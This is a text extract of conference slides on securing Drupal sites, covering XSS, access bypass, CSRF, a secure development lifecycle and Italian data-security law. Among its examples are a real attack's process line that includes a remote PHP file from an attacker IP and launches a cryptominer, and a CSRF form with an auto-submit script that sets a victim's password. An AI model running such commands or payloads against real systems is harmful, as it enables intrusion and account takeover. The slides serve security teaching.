Secure Drupal, from start to finish (European Drupal Days 2015)

© Ibuildings 2014/2015 - All rights reserved

#DrupalDaysEU

Secure Drupal From start to finish


Speaker InfoBoy BaukemaSecurity Specialist

[email protected]@relaxnow

•

#DrupalDaysEU


• Security Specialist

• R&D Security

• Internal & External

• Security Training

• Consulting

• Security Audits

A Security what?


This is the Talk Title and it could be very long, for example on two lines or more


#DrupalDaysEU


Gold Sponsors

#DrupalDaysEU


/usr/sbin/apache2 -‐k start \_ /usr/sbin/apache2 -‐k start \_ /usr/local/php539/bin/php-‐cgi -‐dauto_prepend_file=http://XXX.XXX.XXX.XXX/one.txt -‐dallow_url_include=on \_ sh -‐c /tmp/sh.sh \_ ./minerd -‐a scrypt -‐o stratum+tcp://multi.ghash.io:3333 -‐u lscllc.worker16 -‐p x

Such hacked. Much coins.

http://199.119.137.91/one.txt

stratum+tcp://multi.ghash.io:3333

#DrupalDaysEU


[20:51:04] root@bal-‐XXXX.prod:/var/log/nginx# zgrep "POST / HTTP/1.1" access.log | egrep -‐o 'forwarded_for="[^\s,"]+?' | cut -‐d'"' -‐f2 | sort | uniq -‐c | sort -‐nr | head -‐30 2112 104.130.25.XXX 1144 37.221.162.XXX 1067 185.13.37.XXX 1066 77.247.181.XXX 1058 77.109.141.XXX 1047 5.135.158.XXX 1042 178.175.139.XXX

HTTP Flood

#DrupalDaysEU


Gold Sponsors

•

#DrupalDaysEU


• Drupal Top 3

• Secure Development Lifecycle

• The Law

The Plan

#DrupalDaysEU


// to expand it out into a comma-delimited set of placeholders.foreach (array_filter($args, 'is_array') as $key => $data) { $new_keys = array(); foreach ($data as $i => $value) { // This assumes that there are no other placeholders that use the same // name. For example, if the array placeholder is defined as :example // and there is already an :example_2 placeholder, this will generate

/includes/database/database.inc



Source: http://drupalsecurityreport.org/sites/g/files/g598426/f/201403/drupal-security-whitepaper-1-3.pdf

#DrupalDaysEU


/*** Preprocess function to replace the regular label with the * display label*/function field_display_label_preprocess_field(&$variables) { $field = field_info_instance(...); if ( isset($field['display_label']) && strlen(trim($field['display_label'])) > 0 ) { $variables['label'] = $field['display_label'];

1. XSS

From: http://cgit.drupalcode.org/field_display_label/tree/field_display_label.module?id=e7f54e1ee44cd6f0fdbc16ac81f2cfb13f3d3d67

#DrupalDaysEU


1. drupal_set_message

2. l

3. watchdog

Which function(s) should receive check_plain() content

#DrupalDaysEU


1. drupal_set_message

2. l

3. watchdog

Which function(s) should receive check_plain() content

Use t('@') syntax!

$text = t( "@name's blog", [ '@name' => format_username($account) ]);


Filter Input As early as possible

#DrupalDaysEU


$_GET, $_POST, $_REQUEST, $_COOKIE, $_SERVER, $_FILES, $argv

everything from the database

$form_state (mostly ['input'])argdrupal_get_query_parametersdrupal_current_script_urldrupal_detect_baseurlrequest_path

What is input?

#DrupalDaysEU


Sanitize: $id = (int) arg(1); $accountEnabled = (bool) arg(1);

Validate: Form validators in_array() mb_strlen() > 1024 url_is_external valid_url

Filter / Sanitize / Validate


Encode Output As late as possible

#DrupalDaysEU


Gold Sponsors

#DrupalDaysEU


// This is to be accessible to all users, // so 'access callback' can be set// to TRUE, meaning that we should // bypass all access checks.

'access callback' => TRUE,

2. Access Bypass

#DrupalDaysEU


global $user;

if ($user->uid = 1) { watchdog('mymodule', request_uri());}

A disturbance in the force

•

#DrupalDaysEU


• IDE / code sniffer (coder tools) • if (1 = $uid) • === instead of == • user_uid_optional_load($uid = NULL)

Avoiding accidental assign

#DrupalDaysEU


<form action="http://mysite.com/contact" method="post" />

3. Cross Site Request Forgery

#DrupalDaysEU


<form action="https://www.drupal.org/user/2457520/edit" method="post"> <input type="hidden" name="pass[pass1]" value="hacked1" />


#DrupalDaysEU


<script>$('#contactform').submit(); </script>


#DrupalDaysEU


Gold Sponsors

#DrupalDaysEU


=> drupal_get_token

<= drupal_valid_token

Drupal Forms to the rescue!

•

#DrupalDaysEU


• Authentication / Session

• Arbitrary Code Execution

• Denial of Service

• Information Disclosure

• Logic error

• Open Redirect

• Password Protection Bypass

• Session Fixation

• SQL Injection

• ....

4. Others

#DrupalDaysEU


Gold Sponsors

#DrupalDaysEU


Gold Sponsors



#DrupalDaysEU


1. Education & Guidance

•

#DrupalDaysEU


• Threat Assessment

• Security Requirements

2. Design time security

•

#DrupalDaysEU


• Architecture Review

• Code Review

3. Security Review

#DrupalDaysEU


4. Security Testing

The OWASP Application Security Verification Standard (ASVS) Project

provides a basis for testing web application technical security

controls.

•

#DrupalDaysEU


• Identify third party dependencies

• ... follow their Security Mailinglists

• Make rebuilding painless.

• Make redeploying painless.

• Backup & restore from backup 'regularly'

5. Vulnerability Management



#DrupalDaysEU


Gold Sponsors


The Law

#DrupalDaysEU


the penalty for failure to adopt the minimum measures is that of Article 169 of the Code (imprisonment up to two years);

damages -the manager has the burden of proof that he took all that was possible to avoid the damage, referring to appropriate practice known techniques of computer security , while the victim must only prove the existence of damage.

Misure minime di sicurezza

•

#DrupalDaysEU


• Individually associated accounts

• > 8 character passwords

• Changed every 3 to 6 months

• Do not leave admin unattended

• Privileges on need to know basis

• Verify privileges at least yearly

• Update at least every 6 months

• Backup data at least weekly

Disciplinare tecnico

#DrupalDaysEU


Gold Sponsors

Bob's Story

#DrupalDaysEU


ResponsibleDisclosure

•

#DrupalDaysEU


• Know your law

• Think like an attacker

• ... but don't become one (without permission)

• Make sure white hats have a place to go

• Filter Input, Encode Output

• Train your developers

• Design with security in mind

• Review and be critical

• Trust but verify that you are secure

• Perform active automated maintenance

In summary

•

#DrupalDaysEU


• http://www.slideshare.net/relaxnow/drupaldays-2015

• http://crackingdrupal.com

• http://drupalsecurityreport.com

• http://drupal.org/writing-secure-code

• http://owasp.org

• OWASP ASVS

The End

Internet

Secure Drupal, from start to finish (European Drupal Days 2015)